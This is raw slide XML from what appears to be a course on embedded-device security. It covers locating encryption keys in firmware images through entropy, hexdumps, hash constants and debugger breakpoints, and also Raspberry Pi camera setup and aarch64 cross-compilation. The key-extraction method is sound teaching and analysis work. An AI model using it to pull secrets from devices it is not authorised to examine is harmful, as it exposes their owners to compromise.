          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Largest entropy positions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  position: 160(a0)  entropy: 02.5000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hexdump find_key1_arm.o</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000000 457f 464c 0101 0001 0000 0000 0000 0000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000090 0000 e1a0 d004 e24b 8800 e8bd 0000 0000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000a0 ccdb 7805 fbe4 2b50 ec79 670f 4ea9 8331   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>This is the key, as predicted!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000b0 0010 0000 9b40 8101 b0b0 8480 0000 0000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B69FC32-DD3A-A348-8E5E-DF2596C5E652}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20660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Find crypto in image --- more tricks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="2181676"/>
            <a:ext cx="11582400" cy="3900469"/>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Look for common constants (like hash initialization constants)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Look for S-Boxes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Often the key is ”hidden” in the image but the crypto library is dynamically linked.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>ldd</a:t>
            </a:r>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Break at the encrypt (or decrypt) call.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Now look for it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>You can use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>ctrace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> too</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Check out the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Ghidra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US"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CA7EB617-A421-8440-AC2A-484955359B27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3927441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50773"/>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Build your own security camera</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276124" y="1491506"/>
            <a:ext cx="8266130"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We attacked an IP camera earlier based on vulnerabilities.  Suppose you are paranoid and want to build your own to avoid problems.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Start with a Raspberry Pi and configure the OS (including the passwords and interfaces to be safe).  Make sure you can update the software safely as you learn more.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Attach a camera to the (build in) raspberry pi interface. For example, buy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Raspberry Pi Mini Camera Video Module 5 Megapixels 1080p Sensor OV5647 Webcam for Raspberry Pi Model A/B/B+, Pi 2 and Raspberry Pi 3, 3b+</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use the (standard) utilities  to connect to the camera and get images or video.  On Linux these utilities include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>raspistill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raspivid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>raspiyuv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> are command line tools.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>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sz="16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37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A16CBB2-A119-434D-83DB-6C18D7727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48788" y="1776080"/>
            <a:ext cx="3167088" cy="3903436"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7977314-0692-D746-9133-3D7F4D2D1920}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8936182" y="5846618"/>
            <a:ext cx="2266967" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Picture from Amazon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="429089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64 bit ARM (aarch64)</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482658" y="1585865"/>
            <a:ext cx="11226684"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64 bit arm uses similar (but not identical) tools for cross compilation, disassembly and cross architecture simulation of ARM images.</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See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>https://packages.ubuntu.com/xenial/devel/g++-aarch64-linux-gnu for packages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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g++-5-aarch64-linux-gnu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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gcc-aarch64-linux-gnu </a:t>
            </a:r>
          </a:p>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>qemu</a:t>
            </a:r>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https://packages.ubuntu.com/xenial/qemu-user-static</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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apt-get install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>qemu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qemu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-user-static </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>binfmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-support </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>debootstrap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial"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To compile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>c++</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> code: aarch64-linux-gnu-g++ -static</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To compile c-code: aarch64-linux-gnu-gcc -static</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To disassemble: aarch64-linux-gnu-objdump --disassemble-all test1_arm.o</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>qemu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> on arm64 images: qemu-aarch64-static </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>arm_test.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3641951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64 bit ARM (aarch64)</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482658" y="1537769"/>
            <a:ext cx="11226684" cy="4657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arm64 (aarch64) architecture is significantly different from 32 bit ARM processors especially with respect to how condition codes are managed.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following two slides give examples of aarch64 assembly to add and subtract multi-64 bit integers using special instructions that ”add with carry.”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You can buy Raspberry pi processors with 64-bit processors and 4GB of main memory for about $150.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Try to write your own aarch64 assembly code.  Compile it and run it (for testing) under the static </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>qemu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> simulators mentioned on the previous slides.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Do the same for 32 bit ARM processors (note the cross compilers and simulators have different names for 32 and 64 bit systems).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extra credit, implement multiplication for multi 64-bit word integers (this is not too hard).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Then do division for multi 64-bit word integers.  This is harder and you may want to read the relevant section in Knuth, Art of Computer Programming, volume II.  Doing this on an x64 based architecture is easier since it has an instruction that divides a 128 bit quantity by a 64 bit quantity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="16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39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1566724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41166" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Getting to know the ecosystem</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Processor Architectures</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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ARM (ARM7, ARM9, Cortex)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Intel ATOM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MIPs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8051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Atmel AVR</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Motorola 6800/68000 (68k)</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Ambarell</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Axis CRIS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Xtensa (ESP32)</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RISC-V</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F3818A0-EC65-FD46-9A8C-FC51659049D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7580671" y="15436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91" descr="page29image7994608">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95676D10-2C31-A341-966D-C7AEE0FA6D57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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6650182" y="1543601"/>
            <a:ext cx="4537289" cy="306746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7601195-46C2-094F-B096-4756077C4963}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4126645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64 bit ARM (aarch64)</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383426" y="1403302"/>
            <a:ext cx="6028978"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Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>u_add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>(int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>size_a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>, int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>size_b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>, uint64_t* a, uint64_t* b, int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>size_c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
